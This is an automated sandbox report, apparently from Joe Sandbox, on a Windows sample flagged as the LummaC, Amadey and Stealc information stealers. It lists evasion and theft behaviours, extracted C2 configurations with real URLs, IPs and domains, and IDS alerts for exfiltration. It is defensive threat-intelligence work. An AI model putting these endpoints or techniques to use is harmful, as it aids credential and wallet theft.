Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1541351
MD5: 20430d8d39abdf5fc6b9654a561b7e83
SHA1: 9d1c8689f22d03701e34afd63e0bda0a627bb8b8
SHA256: 69d745bdccdf2c55a32b1fcb94ce3b99e389978e505f8b6add95fc11a043e8b4
Tags: exe, user-Bitsight

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SIDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000003.00000002.2368072745.0000000000131000.00000040.00000001.01000000.00000006.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 39.2.num.exe.180000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 26e226f915.exe.6976.11.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["dissapoiznw.store", "licendfilteo.site", "clearancek.site", "eaglepawnoy.store", "mobbipenju.store", "bathdoomgaz.store", "spirittunek.store", "studennotediw.store"], "Build id": "4SD0y4--legendaryy"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe ReversingLabs: Detection: 44%
Source: file.exe ReversingLabs: Detection: 42%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49995 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50003 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50004 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50024 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50028 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50034 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50045 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50050 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50056 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50060 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50077 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50082 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe, 00000006.00000003.2371701533.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, M0SHVBI03XTU9LNHD2O8UA8TC8F.exe, 00000006.00000002.2505556141.0000000000A92000.00000040.00000001.01000000.0000000B.sdmp
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: number of queries: 1474
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 11_2_008799D0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp] 11_2_0083D110
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp] 11_2_0083D110
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 11_2_0083FCA0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 11_2_00840EEC
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp] 11_2_00875700
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 11_2_00846F91
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 11_2_008349A0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h 11_2_00873920
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 11_2_0084D961
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then jmp eax 11_2_00841ACD
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 11_2_008442FC
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then jmp eax 11_2_00841A3C
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 11_2_00874A40
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 11_2_00835A50
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 11_2_00843BE2
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 11_2_00841BEE
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov ebp, eax 11_2_0083A300
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 11_2_00879B60
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h 11_2_0085CCD0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp] 11_2_0085CCD0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h 11_2_0085CCD0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp] 11_2_00879CE0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh 11_2_00879CE0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 11_2_0084B410
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov word ptr [eax], cx 11_2_0084D457
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 11_2_0085C470
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h] 11_2_00838590
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh 11_2_0085FD10
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 11_2_00846536
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 11_2_00841E93
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 11_2_00836EA0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then movzx ecx, word ptr [ebp+00h] 11_2_0083BEB0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 11_2_00846EBF
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 11_2_00846F91
Source: firefox.exe Memory has grown: Private usage: 1MB later: 189MB

Networking

Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:63233 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:62979 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:64853 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:54902 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:57464 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:62811 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:60695 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:52918 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49819 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49992 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:55324 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:62744 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:64287 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:50091 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:53085 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:60779 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:59929 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:55961 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49993
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49996 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50000 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:59100 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:65109 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:55478 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:49816 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:54200 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:65448 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:64451 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49999 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50006 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:65096 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:50929 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:56637 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:49291 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:64074 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:54065 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:64110 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50015 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50020 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50051 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:65515 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:49842 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50063 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50065 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50098 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49710 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49708 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49716 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49739 -> 104.21.53.8:443
